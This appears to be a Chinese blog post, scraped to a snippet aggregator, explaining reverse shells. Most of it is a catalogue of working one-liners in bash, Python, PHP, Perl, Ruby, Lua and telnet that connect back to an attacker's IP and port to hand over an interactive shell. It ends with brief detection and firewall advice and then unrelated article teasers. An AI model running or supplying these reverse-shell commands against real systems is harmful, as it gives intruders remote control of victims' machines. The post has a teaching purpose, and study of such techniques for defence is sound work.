网络安全-反弹shell详解(攻击,检测与防御)(代码片段)

lady_killer9 lady_killer9     2023-01-05     666

关键词:

目录

简介

原理

反弹shell

bash

nc

python

php

perl

ruby

lua

 telnet

检测

防御

参考


简介

如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。

原理

操作受害者机器,将某开放端口的数据发送到可执行命令的程序上,将结果返回给攻击机。攻击机发送向受害者开放端口发送命令,接收命令执行结果。

反弹shell

bash

bash -i >& /dev/tcp/ip/port 0>&1

0:标准输入;1:标准输出;2:标准错误。

bash -i:产生一个交互式环境

>&:将标准输出和标准错误结合,一起重定向给后者

/dev/tcp/ip/port:建立一个tcp连接

0>&1:将标准输入重定向到标准输出

nc

Linux命令-nc(端口监控、文件传输、反弹shell等)_lady_killer9的博客-CSDN博客

python

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

python -c command

将字符串当做python代码执行

同理,上面也是利用bash进行的反弹

php

php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'

perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

ruby

ruby -rsocket -e'f=TCPSocket.open("接收端ip",端口).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

 telnet

	mknod a p; telnet 接收端IP 端口 0<a | /bin/bash 1>a

Windows平台,可以使用powercat   reverseudpshell   icmpsh

检测

及时发现Bash进程启动事件

检查Bash进程是否打开了终端设备,是否有主动对外连接

防御

防火墙限制

Netlink监听,kill进程(详见腾讯云参考)

参考

​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩

常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛

自动化反弹Shell防御技术 - 云+社区 - 腾讯云

[系统安全]三十七.apt系列远控木马详解与防御及apt攻击中的远控

您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学... 查看详情

终端安全检测与防御技术(代码片段)

...技术等问题高级持续威胁APT(高级持续性威胁)攻击的攻击目标明确、攻击时间周期长ÿ 查看详情

事件响应必备:dns攻击与防御矩阵

...出不穷。F5发布的数据显示,DNS/DDoS攻击已经成为主要网络安全威胁之一。并且攻击手段逐渐变得复杂和隐蔽,如DNS隧道、DNS流量劫持攻击等,对网络安全和数据隐私提出了更高的要求。不仅是攻击技术的多样化和复... 查看详情

终端安全检测与防御技术(代码片段)

...技术等问题高级持续威胁APT(高级持续性威胁)攻击的攻击目标明确、攻击时间周期长,攻击方法多,隐藏性很好,以便达到继续渗透、监视、敏感数据窃取的目的本地渗透扩散攻击者向被控主机传送新病毒... 查看详情

dpi(deeppacketinspection)深度包检测技术

详解DPI与网络回溯分析技术  随着网络通讯技术进步与发展,网络通讯已跨入大数据时代,如何监控各类业务系统的通讯数据在大数据流量中传输质量,以及针对海量的网络通讯数据的范畴中存在少量的恶意流量的检测,避免... 查看详情

网络安全与防御

1.什么是IDS?IDS(入侵检测系统):入侵检测是防火墙的合理补充,帮助系统对付网络攻击,扩展了系统管理员的安全管理能力,提高了信息安全基础结构的完整性。主要针对防火墙涉及不到的部分进行检测。入... 查看详情

信息安全工程师笔记-网络安全主动防御技术与应用

入侵防御系统(IPS)入侵防御系统(IntrusionPreventionSystem)是一种主动的、积极的入侵防范及阻止系统(防火墙是被动的),它部署在网络的进出口处,当检测到攻击企图后,自动地将攻击包丢... 查看详情

渗透攻击powershell与shell有什么区别详解用法及安全(代码片段)

目录 PowerShell 执行策略 混淆 常见功能 计划任务 创建链接 编码 其他 参考链接 Shell 简介 元字符 通配符正在码字ing。。。 PowerShell 执行策略PowerShell提供了Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined六种类... 查看详情

渗透攻击powershell与shell有什么区别详解用法及安全(代码片段)

目录 PowerShell 执行策略 混淆 常见功能 计划任务 创建链接 编码 其他 参考链接 Shell 简介 元字符 通配符正在码字ing。。。 PowerShell 执行策略PowerShell提供了Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined六种类... 查看详情

网络知识详解之:网络攻击与安全防护(代码片段)

网络知识详解之:网络攻击与安全防护计算机网络相关知识体系详解网络知识详解之:TCP连接原理详解网络知识详解之:HTTP协议基础网络知识详解之:HTTPS通信原理剖析(对称、非对称加密、数字签名、数字... 查看详情

网络安全思维导图

...//www.itcodemonkey.com/article/730.html本文包含以下思维导图:●网络安全绪论●扫描与防御技术●网络监听及防御技术●口令破解及防御技术●欺骗攻击及防御技术●拒绝服务供给与防御技术●缓冲区溢出攻击及防御技术●Web攻击及防... 查看详情

网络安全-dos与ddos攻击原理(tcpudpcc攻击等)与防御

目录DoS简介DDoS相关事件GithubDDoS事件原理TCPSYNFloodUDPCC攻击(HttpFlood)防御参考DoS简介DoS,是DenialofService的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务... 查看详情

虚拟化网络攻防实践报告

... 靶机:包含应用系统和应用程序安全漏洞,髌骨走位攻击目标的主机。l 攻击机:安装一些专用的攻击软件,用于发起网络攻击的主机。l 攻击检测、分析与防御平添:最佳位置是靶机的网管,可以给予Linux操作系统... 查看详情

hidswazuh系列4-反弹shell规则

0x00介绍1.背景介绍传统的入侵检测,主要分为网络入侵检测系统和主机入侵检测系统,分别作用于网络层面和主机(服务器、办公电脑等终端)。随着技术发展,出现了结合传统入侵检测系统和新技术(如数据分析、威胁情报、... 查看详情

阿里云盾轻松防御ddoscc攻击

...入侵检测、防DDoS等一站式安全服务。产品功能:1、防DDoS攻击2、网站后门检测3、主机密码暴力破解防御4、网页漏洞、服务器端口检测阿里云安全策略:“生产数据不出生产集群”阿里云基于阿里巴巴集团十多年风险管控经验 查看详情

网络安全思维导图(全套11张)

本文包含以下思维导图:●网络安全绪论●扫描与防御技术●网络监听及防御技术●口令破解及防御技术●欺骗攻击及防御技术●拒绝服务供给与防御技术●缓冲区溢出攻击及防御技术●Web攻击及防御技术●木马攻击与防御技术... 查看详情

局域网的安全与防御

  提到安全攻击,往往会想到攻击来自于互联网,而内部的局域网安全问题被忽略。在企业局域网中也存在很多安全隐患,本篇博客介绍几种局域网内部的安全攻击与防御常见的局域网攻击1、MAC地址扩散攻击  我... 查看详情

ddos攻击与防御

分布式拒绝服务攻击的精髓是,利用分布式的客户端,向服务提供者发起大量看似合法的请求,消耗或长期占用大量资源,从而达到拒绝服务的目的。从不同的角度看,分布式拒绝服务攻击的方法有不同的分类标准。依据消耗目... 查看详情